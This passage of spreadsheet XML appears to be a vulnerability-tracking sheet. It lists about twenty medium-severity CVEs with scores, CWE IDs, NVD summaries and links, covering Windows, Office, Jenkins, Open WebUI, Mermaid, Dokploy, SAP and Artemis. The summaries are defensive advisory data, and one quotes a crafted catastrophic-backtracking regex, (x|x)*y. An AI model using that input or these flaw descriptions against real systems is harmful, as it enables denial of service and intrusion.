      <c r="C1536" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1536" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1536" s="5" t="inlineStr"/>
      <c r="F1536" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1536" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1536" s="5" t="inlineStr"/>
      <c r="I1536" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1536" s="5" t="inlineStr"/>
      <c r="K1536" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1536" s="5" t="inlineStr">
        <is>
          <t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t>
        </is>
      </c>
    </row>
    <row r="1537">
      <c r="A1537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69855</t>
        </is>
      </c>
      <c r="C1537" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1537" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1537" s="5" t="inlineStr"/>
      <c r="F1537" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1537" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure</t>
        </is>
      </c>
      <c r="H1537" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure_copilot</t>
        </is>
      </c>
      <c r="I1537" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J1537" s="5" t="inlineStr"/>
      <c r="K1537" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1537" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Copilot in Azure allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69855</t>
        </is>
      </c>
    </row>
    <row r="1538">
      <c r="A1538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70019</t>
        </is>
      </c>
      <c r="C1538" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1538" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1538" s="5" t="inlineStr"/>
      <c r="F1538" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1538" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1538" s="5" t="inlineStr"/>
      <c r="I1538" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1538" s="5" t="inlineStr"/>
      <c r="K1538" s="5" t="inlineStr">
        <is>
          <t>CWE-65</t>
        </is>
      </c>
      <c r="L1538" s="5" t="inlineStr">
        <is>
          <t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t>
        </is>
      </c>
    </row>
    <row r="1539">
      <c r="A1539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70429</t>
        </is>
      </c>
      <c r="C1539" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1539" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1539" s="5" t="inlineStr"/>
      <c r="F1539" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1539" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="H1539" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="I1539" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1539" s="5" t="inlineStr"/>
      <c r="K1539" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L1539" s="5" t="inlineStr">
        <is>
          <t>Jenkins 2.575 and earlier, LTS 2.568.1 and earlier handles case-insensitivity in user names and group names inconsistently, allowing attackers able to create new users or groups with names that case-insensitively match other characters to impersonate other users or be granted their permissions in some circumstances.</t>
        </is>
      </c>
      <c r="M1539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70429</t>
        </is>
      </c>
    </row>
    <row r="1540">
      <c r="A1540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70491</t>
        </is>
      </c>
      <c r="C1540" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1540" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1540" s="5" t="inlineStr"/>
      <c r="F1540" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1540" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1540" s="5" t="inlineStr"/>
      <c r="I1540" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1540" s="5" t="inlineStr"/>
      <c r="K1540" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1540" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. In 0.10.2 and earlier, the GET /api/v1/tools/, GET /api/v1/tools/list, and GET /api/v1/tools/id/{id} endpoints in backend/open_webui/routers/tools.py returned full Python tool source to authenticated non-admin read-only users. ToolResponse deliberately omitted source and specs, but ToolUserResponse permitted extra fields and handlers spread a full tool model dump into the response, re-admitting omitted fields. A non-admin with a read grant can obtain another user's server-side tool source, which commonly embeds hard-coded API keys, credentials, and internal service URLs. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70491</t>
        </is>
      </c>
    </row>
    <row r="1541">
      <c r="A1541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70493</t>
        </is>
      </c>
      <c r="C1541" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1541" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1541" s="5" t="inlineStr"/>
      <c r="F1541" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1541" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1541" s="5" t="inlineStr"/>
      <c r="I1541" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1541" s="5" t="inlineStr"/>
      <c r="K1541" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L1541" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.6 until 0.11.0, the built-in knowledge search path in backend/open_webui/tools/knowledge_fs.py and backend/open_webui/tools/builtin.py let a chat participant choose a pattern used to grep knowledge files. Patterns containing regex metacharacters were compiled with Python's backtracking re engine and run against every line of every reachable file with no time limit, so a crafted pattern such as (x|x)*y and one matching uploaded file line can pin one CPU core and block the event loop. This causes availability impact for every other user of the affected worker. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M1541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70493</t>
        </is>
      </c>
    </row>
    <row r="1542">
      <c r="A1542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71437</t>
        </is>
      </c>
      <c r="C1542" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1542" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1542" s="5" t="inlineStr"/>
      <c r="F1542" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1542" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1542" s="5" t="inlineStr"/>
      <c r="I1542" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1542" s="5" t="inlineStr"/>
      <c r="K1542" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L1542" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. From version 11.5.0 until 11.16.1, Mermaid Architecture Diagrams are vulnerable to prototype pollution when a diagram defines a group with an id of __proto__. Because the group id is used directly as an object property key without validation, an attacker who can supply diagram text can pollute Object.prototype, potentially affecting the behavior of the embedding application. This issue is fixed in version 11.16.1.</t>
        </is>
      </c>
      <c r="M1542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71437</t>
        </is>
      </c>
    </row>
    <row r="1543">
      <c r="A1543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72739</t>
        </is>
      </c>
      <c r="C1543" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1543" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1543" s="5" t="inlineStr"/>
      <c r="F1543" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1543" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1543" s="5" t="inlineStr"/>
      <c r="I1543" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J1543" s="5" t="inlineStr"/>
      <c r="K1543" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1543" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the createCommand() function constructs shell commands by interpolating compose service names and configuration into bash command strings. When a compose with a maliciously crafted name or service definition is deployed, the shell metacharacters are interpreted as command separators, allowing arbitrary command execution on the Docker host. This vulnerability is fixed in 0.29.13.</t>
        </is>
      </c>
      <c r="M1543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72739</t>
        </is>
      </c>
    </row>
    <row r="1544">
      <c r="A1544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72938</t>
        </is>
      </c>
      <c r="C1544" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1544" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1544" s="5" t="inlineStr"/>
      <c r="F1544" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1544" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1544" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1544" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1544" s="5" t="inlineStr"/>
      <c r="K1544" s="5" t="inlineStr">
        <is>
          <t>CWE-822, CWE-843</t>
        </is>
      </c>
      <c r="L1544" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72938</t>
        </is>
      </c>
    </row>
    <row r="1545">
      <c r="A1545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72939</t>
        </is>
      </c>
      <c r="C1545" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1545" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1545" s="5" t="inlineStr"/>
      <c r="F1545" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1545" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1545" s="5" t="inlineStr"/>
      <c r="I1545" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1545" s="5" t="inlineStr"/>
      <c r="K1545" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1545" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72939</t>
        </is>
      </c>
    </row>
    <row r="1546">
      <c r="A1546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72942</t>
        </is>
      </c>
      <c r="C1546" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1546" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1546" s="5" t="inlineStr"/>
      <c r="F1546" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1546" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1546" s="5" t="inlineStr"/>
      <c r="I1546" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1546" s="5" t="inlineStr"/>
      <c r="K1546" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1546" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72942</t>
        </is>
      </c>
    </row>
    <row r="1547">
      <c r="A1547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72956</t>
        </is>
      </c>
      <c r="C1547" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1547" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1547" s="5" t="inlineStr"/>
      <c r="F1547" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1547" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1547" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1547" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1547" s="5" t="inlineStr"/>
      <c r="K1547" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1547" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72956</t>
        </is>
      </c>
    </row>
    <row r="1548">
      <c r="A1548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72974</t>
        </is>
      </c>
      <c r="C1548" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1548" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1548" s="5" t="inlineStr"/>
      <c r="F1548" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1548" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1548" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1548" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1548" s="5" t="inlineStr"/>
      <c r="K1548" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1548" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72974</t>
        </is>
      </c>
    </row>
    <row r="1549">
      <c r="A1549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72975</t>
        </is>
      </c>
      <c r="C1549" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1549" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1549" s="5" t="inlineStr"/>
      <c r="F1549" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1549" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1549" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I1549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1549" s="5" t="inlineStr"/>
      <c r="K1549" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1549" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72975</t>
        </is>
      </c>
    </row>
    <row r="1550">
      <c r="A1550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72977</t>
        </is>
      </c>
      <c r="C1550" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1550" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1550" s="5" t="inlineStr"/>
      <c r="F1550" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1550" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1550" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="I1550" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1550" s="5" t="inlineStr"/>
      <c r="K1550" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L1550" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72977</t>
        </is>
      </c>
    </row>
    <row r="1551">
      <c r="A1551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75509</t>
        </is>
      </c>
      <c r="C1551" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1551" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1551" s="5" t="inlineStr"/>
      <c r="F1551" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1551" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1551" s="5" t="inlineStr"/>
      <c r="I1551" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1551" s="5" t="inlineStr"/>
      <c r="K1551" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="L1551" s="5" t="inlineStr">
        <is>
          <t>joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. Prior to version 1.7.3, JWTClaimsRegistry applies membership matching to list-valued iss and sub claims, allowing an array-valued iss that contains the expected issuer to pass an intended equality check and enabling issuer-validation bypass. This issue is fixed in version 1.7.3.</t>
        </is>
      </c>
      <c r="M1551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75509</t>
        </is>
      </c>
    </row>
    <row r="1552">
      <c r="A1552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75880</t>
        </is>
      </c>
      <c r="C1552" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1552" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1552" s="5" t="inlineStr"/>
      <c r="F1552" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1552" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1552" s="5" t="inlineStr"/>
      <c r="I1552" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1552" s="5" t="inlineStr"/>
      <c r="K1552" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L1552" s="5" t="inlineStr">
        <is>
          <t>An authenticated client could attach a consumer with a selector containing crafted wildcard usage that results in excessive evaluation during message delivery attempts, occupying a shared broker thread and leading to denial of service.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes this issue.</t>
        </is>
      </c>
      <c r="M1552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75880</t>
        </is>
      </c>
    </row>
    <row r="1553">
      <c r="A1553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76968</t>
        </is>
      </c>
      <c r="C1553" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1553" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1553" s="5" t="inlineStr"/>
      <c r="F1553" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1553" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1553" s="5" t="inlineStr"/>
      <c r="I1553" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1553" s="5" t="inlineStr"/>
      <c r="K1553" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L1553" s="5" t="inlineStr">
        <is>
          <t>SAP Web Dispatcher, Internet Communication Manager and SAP Content Server allows an authenticated low-privileged attacker to access certain administrative functionality or interface and obtain sensitive information about the system state, resulting in information disclosure. This disclosed information could potentially be used to facilitate further attacks. This vulnerability has a high impact on the confidentiality of the application, with no impact on integrity or availability.</t>
        </is>
      </c>
      <c r="M1553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t>
        </is>
      </c>
    </row>
    <row r="1554">
      <c r="A1554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76971</t>
        </is>
      </c>
      <c r="C1554" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1554" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1554" s="5" t="inlineStr"/>
      <c r="F1554" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1554" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H1554" s="5" t="inlineStr"/>
      <c r="I1554" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1554" s="5" t="inlineStr"/>
      <c r="K1554" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1554" s="5" t="inlineStr">
        <is>
          <t>Due to a Server-Side Request Forgery (SSRF) vulnerability in SAP Manufacturing Integration and Intelligence, an attacker could cause the server to initiate arbitrary outbound requests. If processed by the application, this behavior could be combined with XML/XSL processing to enable execution of scripts. Successful exploitation could result in a low impact on the confidentiality, integrity, and availability of the application.</t>
        </is>
      </c>
      <c r="M1554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t>
        </is>
      </c>
    </row>
    <row r="1555">
      <c r="A1555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77911</t>
        </is>
      </c>
      <c r="C1555" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1555" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1555" s="5" t="inlineStr"/>
      <c r="F1555" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1555" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1555" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1555" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1555" s="5" t="inlineStr"/>
      <c r="K1555" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1555" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77911</t>
        </is>
      </c>
    </row>
    <row r="1556">
      <c r="A1556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78441</t>
        </is>
      </c>
      <c r="C1556" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1556" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1556" s="5" t="inlineStr"/>
      <c r="F1556" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1556" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1556" s="5" t="inlineStr"/>
      <c r="I1556" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1556" s="5" t="inlineStr"/>
      <c r="K1556" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1556" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows OLE DB allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78441</t>
        </is>
      </c>
    </row>
    <row r="1557">
      <c r="A1557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78453</t>
        </is>
      </c>
      <c r="C1557" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D1557" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1557" s="5" t="inlineStr"/>
      <c r="F1557" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1557" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
